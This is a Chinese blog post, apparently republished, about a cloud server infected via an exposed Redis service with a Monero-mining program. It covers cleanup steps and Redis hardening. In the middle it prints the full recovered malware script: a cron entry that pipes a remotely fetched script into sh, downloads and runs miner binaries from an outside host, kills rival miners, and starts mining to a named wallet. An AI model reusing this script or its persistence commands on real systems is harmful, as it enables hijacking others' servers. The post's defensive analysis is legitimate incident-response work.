2. 程式人生 > >阿里雲伺服器被挖礦程式minerd入侵的終極解決辦法

阿里雲伺服器被挖礦程式minerd入侵的終極解決辦法

阿新 發佈:2019-02-18

歡迎掃碼加入Java高知群交流


      突然發現阿里雲伺服器CPU很高,幾乎達到100%,執行 top c 一看,嚇一跳,結果如下:

 3798 root      20   0  386m 7852 1272 S 300.0  0.1   4355:11 /tmp/AnXqV -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:443 -u 4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofT
 5844 root      20   0 3448m 292m  14m S  1.7  3.7  26:02.07 /usr/java/default/bin/java -Xms64M -Xmx1G -Djava.util.logging.config.file=logging.properties -Djava.security.auth.login.config=/us
 2500 root      20   0  220m 9.9m 5176 S  0.3  0.1   0:09.02 /tmp/ddg.217                                                                                                                      
    1 root      20   0 19360 1532 1232 S  0.0  0.0   0:00.61 /sbin/init

有個程序minerd盡然佔用了300%的CPU, 百度了一下,貌似伺服器被利用Redis漏洞攻擊,植入了挖礦程式,挖類似比特幣的東西。

但我去檢視啟動的服務,盡然沒有 lady 這個服務。 找不到根源,那個minerd程序刪掉就又起來了,後來想了個臨時辦法,先停掉了挖礦的程序

1. 關閉訪問挖礦伺服器的訪問 

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd  ,取消掉執行許可權, 在沒有找到根源前,千萬不要刪除 minerd,因為刪除了,過一回會自動有生成一個。

3. pkill minerd  ,殺掉程序

4. service stop crond 或者 crontab -r 刪除所有的執行計劃

5. 執行top,查看了一會,沒有再發現minerd 程序了。

6.檢查/var/spool/cron/目錄下發現有個root使用者的定時器檔案。

下載指令碼的語句:

*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh

病毒檔案內容如下,感興趣的可以研究下: 
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

echo "*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105008 | sh" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105008 | sh" > /var/spool/cron/crontabs/root

if [ ! -f "/tmp/ddg.217" ]; then
    curl -fsSL http://www.haveabitchin.com/ddg.$(uname -m) -o /tmp/ddg.217
fi
chmod +x /tmp/ddg.217 && /tmp/ddg.217
killall /tmp/ddg.216


if [ -d "/opt/yam" ]; then
    rm -rf /opt/yam
fi

ps auxf|grep -v grep|grep /tmp/duckduckgo|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/usr/bin/cron"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/opt/cron"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/usr/sbin/ntp"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/opt/minerd"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9

#/opt/minerd -h
#if [ $? != "0" ]; then
    #ps auxf|grep -v grep|grep "/opt/minerd"
    #if [ $? != "0" ]; then
        #if [ ! -f /opt/yam ]; then
            #curl -fsSL http://www.haveabitchin.com/yam -o /opt/yam
        #fi
        #chmod +x /opt/yam && /opt/yam -c x -M stratum+tcp://4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofToNfyiBwocDYzwY5pjpsMB7MY8v4tkDU71oWpDC:
 
[email protected]:443/xmr
    #fi
#fi

DoMiner()
{
    if [ ! -f "/tmp/AnXqV" ]; then
        curl -fsSL http://www.haveabitchin.com/minerd -o /tmp/AnXqV
    fi
    chmod +x /tmp/AnXqV
    /tmp/AnXqV -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:443 -u 4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofToNfyiBwocDYzwY5pjpsMB7MY8v4tkDU71oWpDC -p x
}
ps auxf|grep -v grep|grep "4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofToNfyiBwocDYzwY5pjpsMB7MY8v4tkDU71oWpDC" || DoMiner


DoRedis6379()
{
    iptables -F REDIS6379
    iptables -A REDIS6379 -p tcp -s 127.0.0.1 --dport 6379 -j ACCEPT
    #iptables -A REDIS6379 -s 0.0.0.0/8 -p tcp --dport 6379 -j ACCEPT
    #iptables -A REDIS6379 -s 10.0.0.0/8 -p tcp --dport 6379 -j ACCEPT
    #iptables -A REDIS6379 -s 169.254.0.0/16 -p tcp --dport 6379 -j ACCEPT
    #iptables -A REDIS6379 -s 172.16.0.0/12 -p tcp --dport 6379 -j ACCEPT
    #iptables -A REDIS6379 -s 192.168.0.0/16 -p tcp --dport 6379 -j ACCEPT
    #iptables -A REDIS6379 -s 224.0.0.0/4 -p tcp --dport 6379 -j ACCEPT
    iptables -A REDIS6379 -p TCP --dport 6379 -j REJECT
    iptables -I INPUT -j REDIS6379
}
iptables -D OUTPUT -j REDIS6379
iptables -F REDIS6379
iptables -X REDIS6379
iptables -D INPUT -j REDIS63792
iptables -F REDIS63792
iptables -X REDIS63792
#iptables -N REDIS6379 && DoRedis6379


解決minerd並不是最終的目的,主要是要查詢問題根源,我的伺服器問題出在了redis服務了,黑客利用了redis的一個漏洞獲得了伺服器的訪問許可權,http://blog.jobbole.com/94518/然後就注入了病毒,下面是解決辦法和清除工作:

1. 修復 redis 的後門,

  1. 配置bind選項, 限定可以連線Redis伺服器的IP, 並修改redis的預設埠6379.
  2. 配置AUTH, 設定密碼, 密碼會以明文方式儲存在redis配置檔案中.
  3. 配置rename-command CONFIG “RENAME_CONFIG”, 這樣即使存在未授權訪問, 也能夠給攻擊者使用config指令加大難度
  4. 好訊息是Redis作者表示將會開發”real user”,區分普通使用者和admin許可權,普通使用者將會被禁止執行某些命令,如conf

2. 開啟 ~/.ssh/authorized_keys, 刪除你不認識的賬號

3. 檢視你的使用者列表,是不是有你不認識的使用者新增進來。 如果有就刪除掉.

歡迎掃碼加入Java高知群交流


相關推薦

阿里伺服器程式minerd入侵終極解決辦法

歡迎掃碼加入Java高知群交流       突然發現阿里雲伺服器CPU很高,幾乎達到100%,執行 top c 一看,嚇一跳,結果如下: 3798 root 20 0 386m 7852 1272 S 300.0 0.1 4355:11 /tm

解決阿里伺服器提示程式風險

      今天大早上收到阿里雲郵件通知,提示有挖礦程式。一個激靈爬起來,折騰了一早上,終於解決問題了。   其實前兩天就一直收到阿里雲的通知,檢測到對外攻擊,阻斷了對其他伺服器6379、 6380和22埠的訪問,當時沒怎麼當一回兒事,反正是我用來自己學習用的,就放著不管了,結果今天事態就大了。

阿里伺服器問題

下午發現伺服器CPU: 12618 root      20   0  680m  17m 1280 S 699.9  0.1  72:13.24 wnTKYg  網上收索解決辦法copy如下: 下面就講解wnTKYg如何清除。最近專案在做效能測試,發現CPU使用率

阿裏服務器病毒minerd入侵解決方法

minerd 挖礦病毒 挖礦程序 木馬 早晨上班像往常一樣對服務器進行例行巡檢,發現一臺阿裏雲服務器的CPU的資源占用很高,到底是怎麽回事呢,趕緊用top命令查看了一下,發現是一個名為minerd的進程占用了很高的CPU資源,minerd之前聽說過,是一種挖礦病毒,沒有想到我負責的服務器會中這

阿里遇到imWBR1程式入侵

在買了阿里雲伺服器,配置了Redis後沒幾天,阿里雲就提醒我說有疑似挖礦的程式在伺服器上,這讓運維小白的我很吃驚,而且自己也沒做過伺服器運維的事,在網上百度了很多,也翻牆google了很多後發現了一篇關於殺死挖礦程序的部落格,轉載給大家看看,http://blog.sina

阿里ECS遭程式攻擊解決方法(徹底清除程式,順便下載了程式的指令碼)

一:殺死挖礦程式程序 在伺服器上使用top指令檢視cpu的使用情況,發現有一個叫java的程式佔用cpu高達99.9% PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND

Linux伺服器程式sustse和kworkerds感染後續處理

在上一篇博文Linux系統發現佔用CPU達100%的程序並處理 裡面以為已經把挖礦程式sustse處理乾淨了,可是沒過兩天又收到阿里雲簡訊提醒,說伺服器有問題,難道還有後門嗎?也多虧阿里雲給出提示“出現了可疑安全事件:Linux共享庫檔案預載入配置檔案可疑篡改”。網上查了查相關內容,原來這個

記一次伺服器程式佔用的解決過程

公司有臺做voip的伺服器最近CPU總是跑滿,這機器自從交給廠家搭好環境後基本就沒怎麼管它,於是進去檢視程序,top了下(見下圖) 這個叫wnTKYg的程序很詭異,已經把CPU吃光了,上網一查,原來是中了挖礦的馬。(啊,我的天。這只是一個單核1G記憶體的阿里雲主機)既然被**

阿里伺服器重置後遠端連結失敗的解決辦法

如題,最近雙11買了阿里雲伺服器,然後倒騰。 由於一系列我自己的無法理解的操作之後,恐將伺服器搞壞,打算重置伺服器。於是,進行了如下操作: 選中自己要重置的阿里雲服務例項-》停止例項-》更多=》磁碟和映象-》重新初始化磁碟 一波操作之後,重新啟動伺服器,然後準備右鍵新建遠端連線。開開心心準備通過ssh遠

阿里伺服器遠端桌面連線提示憑證不工作解決辦法

新手入門弄了一個阿里雲伺服器用來自己學習 在官網上點選遠端連結出現了終端管理的畫面,一切都好好的,小白表示很興奮 安裝官網的步驟一步一步的在本機嘗試遠端連線(系統win7),輸入ip地址,使用者名稱,點選確定,彈框輸密碼 然後就.....,有點難受啊 之後各種百度

阿里伺服器ssh經常一段時間就斷掉解決辦法

#vim /etc/ssh/sshd_config 找到下面兩行 #ClientAliveInterval 0 #ClientAliveCountMax 3 去掉註釋,改成 ClientAliveInterval 30 ClientAliveCountMax 86400 這

阿里提示伺服器程式 該如何處理

臨近2018年底,我們阿里雲上的一臺ECS伺服器竟然被阿里雲簡訊提示有挖礦程式,多次收到阿里雲的簡訊提醒說什麼伺服器被植入挖礦程式,造成系統資源大量消耗;而且還收到CPU使用率達到百分之90的安全提醒,我們的伺服器上並沒有執行大量的網站,只是一個公司的展示網站,怎麼可能會出現CPU%90以上的告警,

主機的應急腳本

res eth done kill -9 capture ogre The true ogr   當雲主機被挖礦之後,一般都不能很快清除挖礦程序,而這時你的雲主機cpu占用率會一直居高不下,為避免主機被鎖定可先用這個腳本殺死挖礦程序,然後再來慢慢排查問題。 腳本內容:

伺服器入侵,程序 command為ld-linux-x86-64佔用cpu很高

測試伺服器看到 ld-linux-x86-64的程序佔用cpu極高,user 是 mysql 的。 測試環境不會有這麼高的mysql負載,並且記憶體佔用基本為0。區塊鏈技術盛行,讓人不得不懷疑被抓去做礦機了。 初步排查 [[email protected]

伺服器解決辦法

公司用的阿里雲的機器,有一天要下班了,公司的雲監控報警說伺服器100%,我就top了一下,發現/tmp/ddgs.3013和/tmp/qW3xT.2兩個檔案把CPU跑滿了,接著百度了一下,發現是挖礦病毒。然後我就kill掉有刪除一下檔案,發現就又出現了,這時心裡有點慌慌不知,

學習hadoop遇到的問題(記一次阿里伺服器惡意掛木馬,CPU100%)

在我剛開始學習時,把防火牆,安全組都開放了,過了一段時間被掛上了木馬。並且殺死程序一會還啟動 解決辦法 1通過命令netstat -antlp|grep 9002檢視埠檔案地址,刪除可以檔案(java資料夾) 2.還得在安全組中關閉hadoop一些對外開放的web頁面(可以改變埠號)

【警惕】大量未修復WebLogic WSAT元件RCE漏洞的主機程式攻擊

警惕從1月1日開始,大量未修復WebLogic WSAT(全稱:Web Services Ato

伺服器後如何處理

挖礦會使伺服器硬體資源,如:CPU、記憶體消耗極大,但是一般運維人員處理挖礦攻擊時最頭疼的就是處理不乾淨,其實挖礦攻擊能夠成功主要方式是通過伺服器安裝的第三方工具內在的對外RestAPI進行的,這些第三方工具如果API存在漏洞就會很大程度被黑客攻擊利用開放的埠進行攻擊 攻擊

關於阿里伺服器擴容資料盤 --格式化資料盤的解決方案

配置的雲盤空間不夠需要擴容,需要在ECS例項上面擴容,僅僅掛載是不夠的需要在命令列再做一些操作 最需要注意的一點是:重啟!重啟!! 重啟!!!如果不重啟,在使用fdisk命令根本沒有擴容後的資料盤 其他的操作直接就可以根據阿里雲的文件直接操作了 1.xshell

阿里安裝mysql後檢視不到初始密碼的解決辦法

在阿里雲安裝mysql後用grep 'A temporary password' /var/log/mysqld.log命令檢視MySQL初始密碼,毛線都沒有看到,然後直接到/var/log/mysqld.log檢視mysqld.log檔案發現檔案是一片空白,一臉懵逼。 解決辦法如下: 修改mysql的配